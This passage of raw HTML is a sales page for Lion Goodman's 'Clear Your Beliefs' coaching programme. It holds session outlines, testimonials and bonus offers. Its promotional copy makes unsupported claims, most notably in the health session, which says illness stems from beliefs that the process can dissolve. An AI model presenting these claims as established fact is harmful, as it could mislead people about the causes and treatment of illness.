speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, 